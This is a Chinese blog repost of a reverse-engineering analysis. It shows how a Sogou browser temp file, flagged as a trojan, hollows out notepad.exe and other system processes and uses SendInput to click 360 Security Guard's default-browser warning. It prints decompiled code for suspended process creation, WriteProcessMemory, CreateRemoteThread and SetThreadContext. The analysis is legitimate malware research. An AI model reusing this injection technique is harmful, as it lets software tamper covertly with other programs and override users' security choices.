侠骨柔肠……
« »
2010年02月6日资源发布

搜狗浏览器修改360安全卫士默认浏览器修改拦截弹框判断结果被微点报为木马

作者:ooxxvsxxoo    2009-12-18 13:50
转载自看雪论坛http://bbs.pediy.com/showthread.php?t=106793

使用搜狗拼音的时候提示下载安装搜狗浏览器, 一时好奇, 装一个呗.

装完后机器上的微点报有木马, 仔细一看报的是搜狗浏览器主进程生成的一个tmp文件.

http://mpicture.micropoint.com.cn/getpic.asp?sid=d20b99b0362eb69d3a3d375ccc1352bb

这是咋回事情呢? 自己的机器一直很干净, 不可能被感染啊…

IDA此TMP…

http://mpicture.micropoint.com.cn/getpic.asp?sid=3379ddda5c443e1a693ff3434186fbcc

嗯 call sub_4011C3, 点进去看看.

if ( SHGetFolderPathW(0, 38, 0, 0, &String2) )
    lstrcpyW(&String2, L”C:\\Program Files”);
lstrcpyW(&Data, &String2);
lstrcatW(&Data, L”\\360\\360se3\\360SE.exe”);
hKey = 0;
if ( !RegOpenKeyW(HKEY_CLASSES_ROOT, L”Applications\\360SE.exe\\shell\\open\\command”, &hKey) )
{
    cbData = 260;
    RegQueryValueExW(hKey, 0, 0, 0, (BYTE *)&Data, &cbData);
}
lstrcpyW(&String1, &String2);
lstrcatW(&String1, L”\\Internet Explorer\\iexplore.exe”);
v13 = &String1;
v14 = L”notepad.exe”;
v15 = L”calc.exe”;
v16 = L”cmd.exe”;
v17 = L”regedit.exe”;
v18 = L”ctfmon.exe”;
v19 = L”osk.exe”;
v20 = L”explorer.exe”;
v21 = &Data;
v2 = 0;
do
{
    wsprintfW(&CommandLine, L”\”%s\”", (&v14)[2 * v2]);
    v4 = 68;
    v3 = &StartupInfo;
    do
    {
      LOBYTE(v3->cb) = 0;
      v3 = (struct _STARTUPINFOW *)((char *)v3 + 1);
      –v4;
    }
    while ( v4 );
    StartupInfo.cb = 68;
    v6 = 16;
    v5 = &ProcessInformation;
    do
    {
      LOBYTE(v5->hProcess) = 0;
      v5 = (struct _PROCESS_INFORMATION *)((char *)v5 + 1);
      –v6;
    }
    while ( v6 );
    result = CreateProcessW(0, &CommandLine, 0, 0, 0, 0x8000004u, 0, 0, &StartupInfo, &ProcessInformation);
    if ( result )
    {
      result = sub_401000(ProcessInformation.hProcess, ProcessInformation.hThread, lpBuffer, a2);
      if ( (_BYTE)result )
        return result;
      result = TerminateProcess(ProcessInformation.hProcess, 0);
    }
    ++v2;
}
while ( v2 < 9 );
return result;
}

哈哈 强大的F5啊. 

原来搜狗和360开战了, 判断下有没有\\360\\360se3\\360SE.exe 360安全浏览器.

如果有的话就调用这些系统进程.

v14 = L”notepad.exe”;
v15 = L”calc.exe”;
v16 = L”cmd.exe”;
v17 = L”regedit.exe”;
v18 = L”ctfmon.exe”;
v19 = L”osk.exe”;
v20 = L”explorer.exe”;

然后

if ( NumberOfBytesWritten == 12
    && (WriteProcessMemory(v9, lpStartAddress, dword_403010, 0x40u, &NumberOfBytesWritten), NumberOfBytesWritten == 64)
    && (WriteProcessMemory(v9, v16, lpBuffer, v5, &NumberOfBytesWritten), NumberOfBytesWritten == v5)
    && (v10 = (DWORD)lpStartAddress, CreateRemoteThread(v9, 0, 0, lpStartAddress, 0, 0, 0)) )
{
    Context.ContextFlags = 65599;
    if ( GetThreadContext(hThread, &Context) )
    {
      Context.Eip = v10;
      SetThreadContext(hThread, &Context);
      ResumeThread(hThread);
    }
    result = 1;
}

嗯 GetThreadContext WriteProcessMemory 猥琐流 改变notepad.exe等的程序执行, 怪不得会被微点报木马了.

v29 = GetProcAddress(v13, ”SendInput”);

搜狗费了这么大的劲来改变notepad.exe的执行顺序, 想干嘛呢?

功力不够, 看不出来了 还是试试看吧.

不懈努力下, 终于搞明白了.

注意图中的红圈, 那是鼠标点击动作.

《搜狗浏览器点击360弹窗》 视频:http://www.tudou.com/programs/view/iD9jtUfeLTs

原来搜狗在用Sendinput点击卫士的默认浏览器修改弹窗.

唉… 有这精力干点啥不好, 非得去攻击别人的软件, 得 被微点报木马了吧.

日志信息 »

该日志于2010-02-06 17:25由 姬良 发表在资源发布分类下, 你可以发表评论。除了可以将这个日志以保留源地址及作者的情况下引用到你的网站或博客,还可以通过RSS 2.0订阅这个日志的所有评论。

4条评论

  1. soolby 说:
    2010年02月7日 于 2:21 下午

    看不明白

  2. 阅城 说:
    2010年02月18日 于 4:40 下午

    哈哈,搜狗。。。就走旁门左道。。春晚上的软性广告,实在让人厌恶。

  3. 阅城 说:
    2010年02月18日 于 4:42 下午

    真的,好东西不用大刀阔斧的宣传。。像亚马逊的服务,当然不是说国内的卓越,人家都是靠服务来换取的好的口碑~并不是说崇洋媚外,有些地方我们伟大的祖-国,还真该学学国-外。

  4. 姬良 说:
    2010年02月18日 于 5:04 下午

    春晚的广告太直接了。

发表评论 »


返回顶部